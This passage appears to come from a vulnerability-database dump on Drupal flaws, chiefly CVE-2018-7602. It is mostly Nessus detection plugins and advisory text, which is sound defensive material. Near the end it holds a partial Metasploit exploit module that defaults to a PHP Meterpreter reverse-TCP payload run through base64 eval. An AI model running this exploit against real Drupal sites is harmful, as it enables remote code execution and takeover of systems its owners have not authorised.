https://www.drupal.org/project/drupal/releases/8.4.7\n\n - https://www.drupal.org/sa-core-2018-003\n\nRPM update: `drupal8-rpmbuild` package dependencies fixed\n\nNote that Tenable Network Security has extracted the 
preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-8fd924a53d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal8 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"drupal8-8.4.8-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:31", "description": "- https://www.drupal.org/project/drupal/releases/8.4.8\n\n - https://www.drupal.org/SA-CORE-2018-004\n\n- https://www.drupal.org/project/drupal/releases/8.4.7\n\n - https://www.drupal.org/sa-core-2018-003\n\nRPM update: `drupal8-rpmbuild` package dependencies fixed\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and 
format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-11T00:00:00", "type": "nessus", "title": "Fedora 27 : drupal8 (2018-1ba93b3144) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602", "CVE-2018-9861"], "modified": "2022-04-22T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-1BA93B3144.NASL", "href": "https://www.tenable.com/plugins/nessus/109705", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-1ba93b3144.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109705);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/22\");\n\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\");\n script_xref(name:\"FEDORA\", value:\"2018-1ba93b3144\");\n 
script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n\n script_name(english:\"Fedora 27 : drupal8 (2018-1ba93b3144) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"- https://www.drupal.org/project/drupal/releases/8.4.8\n\n - https://www.drupal.org/SA-CORE-2018-004\n\n- https://www.drupal.org/project/drupal/releases/8.4.7\n\n - https://www.drupal.org/sa-core-2018-003\n\nRPM update: `drupal8-rpmbuild` package dependencies fixed\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-1ba93b3144\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal8 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 7 SA-CORE-2018-004 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2018/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"drupal8-8.4.8-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:34", "description": "Updated drupal packages fix security vulnerabilities :\n\nDrupal core's text filtering system provides several features including removing inappropriate HTML tags and automatically linking content that appears to be a link. A pattern in Drupal's text matching was found to be inefficient with certain specially crafted strings.\nThis vulnerability is mitigated by the fact that users must have the ability to post content sent to the filter system such as a role with the post comments or Forum topic: Create new content permission (CVE-2012-1588).\n\nDrupal core's Form API allows users to set a destination, but failed to validate that the URL was internal to the site. This weakness could be abused to redirect the login to a remote site with a malicious script that harvests the login credentials and redirects to the live site. 
This vulnerability is mitigated only by the end user's ability to recognize a URL with malicious query parameters to avoid the social engineering required to exploit the problem (CVE-2012-1589).\n\nDrupal core's forum lists fail to check user access to nodes when displaying them in the forum overview page. If an unpublished node was the most recently updated in a forum then users who should not have access to unpublished forum posts were still able to see meta-data about the forum post such as the post title (CVE-2012-1590).\n\nDrupal core provides the ability to have private files, including images, and Image Styles which create derivative images from an original image that may differ, for example, in size or saturation.\nDrupal core failed to properly terminate the page request for cached image styles allowing users to access image derivatives for images they should not be able to view. Furthermore, Drupal didn't set the right headers to prevent image styles from being cached in the browser (CVE-2012-1591).\n\nDrupal core provides the ability to list nodes on a site at admin/content. Drupal core failed to confirm a user viewing that page had access to each node in the list. This vulnerability only concerns sites running a contributed node access module and is mitigated by the fact that users must have a role with the Access the content overview page permission. Unpublished nodes were not displayed to users who only had the Access the content overview page permission (CVE-2012-2153).\n\nThe request_path function in includes/bootstrap.inc in Drupal 7.14 and earlier allows remote attackers to obtain sensitive information via the q[] parameter to index.php, which reveals the installation path in an error message (CVE-2012-2922).\n\nA bug in the installer code was identified that allows an attacker to re-install Drupal using an external database server under certain transient conditions. 
This could allow the attacker to execute arbitrary PHP code on the original server (Drupal SA-CORE-2012-003).\n\nFor sites using the core OpenID module, an information disclosure vulnerability was identified that allows an attacker to read files on the local filesystem by attempting to log in to the site using a malicious OpenID server (Drupal SA-CORE-2012-003).\n\nA vulnerability was identified that allows blocked users to appear in user search results, even when the search results are viewed by unprivileged users (CVE-2012-5651).\n\nDrupal core's file upload feature blocks the upload of many files that can be executed on the server by munging the filename. A malicious user could name a file in a manner that bypasses this munging of the filename in Drupal's input validation (CVE-2012-5653).\n\nMultiple vulnerabilities were fixed in the supported Drupal core version 7 (DRUPAL-SA-CORE-2013-001).\n\nA reflected cross-site scripting vulnerability (XSS) was identified in certain Drupal JavaScript functions that pass unexpected user input into jQuery causing it to insert HTML into the page when the intended behavior is to select DOM elements. Multiple core and contributed modules are affected by this issue.\n\nA vulnerability was identified that exposes the title or, in some cases, the content of nodes that the user should not have access to.\n\nDrupal core provides the ability to have private files, including images. A vulnerability was identified in which derivative images (which Drupal automatically creates from these images based on image styles and which may differ, for example, in size or saturation) did not always receive the same protection. 
Under some circumstances, this would allow users to access image derivatives for images they should not be able to view.\n\nThe drupal package was updated to latest version 7.19 to fix above vulnerabilities.", "cvss3": {}, "published": "2013-04-20T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : drupal (MDVSA-2013:074)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1588", "CVE-2012-1589", "CVE-2012-1590", "CVE-2012-1591", "CVE-2012-2153", "CVE-2012-2922", "CVE-2012-5651", "CVE-2012-5653"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:drupal", "p-cpe:/a:mandriva:linux:drupal-mysql", "p-cpe:/a:mandriva:linux:drupal-postgresql", "p-cpe:/a:mandriva:linux:drupal-sqlite", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2013-074.NASL", "href": "https://www.tenable.com/plugins/nessus/66088", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:074. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66088);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2012-1588\",\n \"CVE-2012-1589\",\n \"CVE-2012-1590\",\n \"CVE-2012-1591\",\n \"CVE-2012-2153\",\n \"CVE-2012-2922\",\n \"CVE-2012-5651\",\n \"CVE-2012-5653\"\n );\n script_bugtraq_id(\n 53359,\n 53362,\n 53365,\n 53368,\n 53454,\n 56993\n );\n script_xref(name:\"MDVSA\", value:\"2013:074\");\n script_xref(name:\"MGASA\", value:\"2012-0320\");\n script_xref(name:\"MGASA\", value:\"2012-0366\");\n script_xref(name:\"MGASA\", value:\"2013-0027\");\n\n script_name(english:\"Mandriva Linux Security Advisory : drupal (MDVSA-2013:074)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated drupal packages fix security vulnerabilities :\n\nDrupal core's text filtering system provides several features\nincluding removing inappropriate HTML tags and automatically linking\ncontent that appears to be a link. A pattern in Drupal's text matching\nwas found to be inefficient with certain specially crafted strings.\nThis vulnerability is mitigated by the fact that users must have the\nability to post content sent to the filter system such as a role with\nthe post comments or Forum topic: Create new content permission\n(CVE-2012-1588).\n\nDrupal core's Form API allows users to set a destination, but failed\nto validate that the URL was internal to the site. 
This weakness could\nbe abused to redirect the login to a remote site with a malicious\nscript that harvests the login credentials and redirects to the live\nsite. This vulnerability is mitigated only by the end user's ability\nto recognize a URL with malicious query parameters to avoid the social\nengineering required to exploit the problem (CVE-2012-1589).\n\nDrupal core's forum lists fail to check user access to nodes when\ndisplaying them in the forum overview page. If an unpublished node was\nthe most recently updated in a forum then users who should not have\naccess to unpublished forum posts were still be able to see meta-data\nabout the forum post such as the post title (CVE-2012-1590).\n\nDrupal core provides the ability to have private files, including\nimages, and Image Styles which create derivative images from an\noriginal image that may differ, for example, in size or saturation.\nDrupal core failed to properly terminate the page request for cached\nimage styles allowing users to access image derivatives for images\nthey should not be able to view. Furthermore, Drupal didn't set the\nright headers to prevent image styles from being cached in the browser\n(CVE-2012-1591).\n\nDrupal core provides the ability to list nodes on a site at\nadmin/content. Drupal core failed to confirm a user viewing that page\nhad access to each node in the list. This vulnerability only concerns\nsites running a contributed node access module and is mitigated by the\nfact that users must have a role with the Access the content overview\npage permission. 
Unpublished nodes were not displayed to users who\nonly had the Access the content overview page permission\n(CVE-2012-2153).\n\nThe request_path function in includes/bootstrap.inc in Drupal 7.14 and\nearlier allows remote attackers to obtain sensitive information via\nthe q[] parameter to index.php, which reveals the installation path in\nan error message (CVE-2012-2922).\n\nA bug in the installer code was identified that allows an attacker to\nre-install Drupal using an external database server under certain\ntransient conditions. This could allow the attacker to execute\narbitrary PHP code on the original server (Drupal SA-CORE-2012-003).\n\nFor sites using the core OpenID module, an information disclosure\nvulnerability was identified that allows an attacker to read files on\nthe local filesystem by attempting to log in to the site using a\nmalicious OpenID server (Drupal SA-CORE-2012-003).\n\nA vulnerability was identified that allows blocked users to appear in\nuser search results, even when the search results are viewed by\nunprivileged users (CVE-2012-5651).\n\nDrupal core's file upload feature blocks the upload of many files that\ncan be executed on the server by munging the filename. A malicious\nuser could name a file in a manner that bypasses this munging of the\nfilename in Drupal's input validation (CVE-2012-5653).\n\nMultiple vulnerabilities were fixed in the supported Drupal core\nversion 7 (DRUPAL-SA-CORE-2013-001).\n\nA reflected cross-site scripting vulnerability (XSS) was identified in\ncertain Drupal JavaScript functions that pass unexpected user input\ninto jQuery causing it to insert HTML into the page when the intended\nbehavior is to select DOM elements. Multiple core and contributed\nmodules are affected by this issue.\n\nA vulnerability was identified that exposes the title or, in some\ncases, the content of nodes that the user should not have access to.\n\nDrupal core provides the ability to have private files, including\nimages. 
A vulnerability was identified in which derivative images\n(which Drupal automatically creates from these images based on image\nstyles and which may differ, for example, in size or saturation) did\nnot always receive the same protection. Under some circumstances, this\nwould allow users to access image derivatives for images they should\nnot be able to view.\n\nThe drupal package was updated to latest version 7.19 to fix above\nvulnerabilities.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:drupal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:drupal-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:drupal-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:drupal-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"drupal-7.19-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"drupal-mysql-7.19-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"drupal-postgresql-7.19-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"drupal-sqlite-7.19-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Remote command execution vulnerability in Drupal\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-05-08T00:00:00", "type": "dsquare", "title": "Drupal 7 SA-CORE-2018-004 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-05-08T00:00:00", "id": "E-637", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "drupal": [{"lastseen": "2021-08-26T18:03:02", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. Updated \u2014 this vulnerability is being exploited in the wild. 
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-25T00:00:00", "type": "drupal", "title": "Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-004\n", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-25T00:00:00", "id": "DRUPAL-SA-CORE-2018-004", "href": "https://www.drupal.org/sa-core-2018-004", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:13", "description": "\nDrupal 7.58 - Drupalgeddon3 (Authenticated) Remote Code (Metasploit)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-30T00:00:00", "title": "Drupal 7.58 - Drupalgeddon3 (Authenticated) Remote Code 
(Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7602"], "modified": "2018-04-30T00:00:00", "id": "EXPLOITPACK:42663502F37846690238B2F6EAF79B4A", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n \n include Msf::Exploit::Remote::HttpClient\n \n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Drupalgeddon3',\n 'Description' => %q{\n CVE-2018-7602 / SA-CORE-2018-004\n A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x.\n This potentially allows attackers to exploit multiple attack vectors on a Drupal site\n Which could result in the site being compromised.\n This vulnerability is related to Drupal core - Highly critical - Remote Code Execution\n\n The module can load msf PHP arch payloads, using the php/base64 encoder.\n\n The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'SixP4ck3r', # Research and port to MSF\n 'Blaklis' # Initial PoC\n ],\n 'References' =>\n [\n ['SA-CORE', '2018-004'],\n ['CVE', '2018-7602'],\n ],\n 'DefaultOptions' =>\n {\n 'encoder' => 'php/base64',\n 'payload' => 'php/meterpreter/reverse_tcp',\n },\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => [ARCH_PHP],\n 
'Targets' =>\n [\n ['User register form with exec', {}],\n ],\n 'DisclosureDate' => 'Apr 29 2018',\n 'DefaultTarget' => 0\n ))\n \n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/']),\n OptString.new('DRUPAL_NODE', [ true, \"Exist Node Number (Page, Article, Forum topic, or a Post)\", '1']),\n OptString.new('DRUPAL_SESSION', [ true, \"Authenticated Cookie Session\", '']),\n ])\n \n register_advanced_options(\n [\n\n ])\n end\n \n def uri_path\n normalize_uri(target_uri.path)\n end\n\n def start_exploit\n drupal_node = datastore['DRUPAL_NODE']\n res = send_request_cgi({\n 'cookie' => datastore['DRUPAL_SESSION'],\n 'method' => 'GET',\n 'uri' => \"#{uri_path}/node/#{drupal_node}/delete\"\n })\n form_token = res.body.scan( /form_token\" value=\"([^>]*)\" \\/>/).last.first\n print \"[*] Token Form -> #{form_token}\\n\"\n r2 = send_request_cgi({\n 'method' => 'POST',\n 'cookie' => datastore['DRUPAL_SESSION'],\n 'uri' => 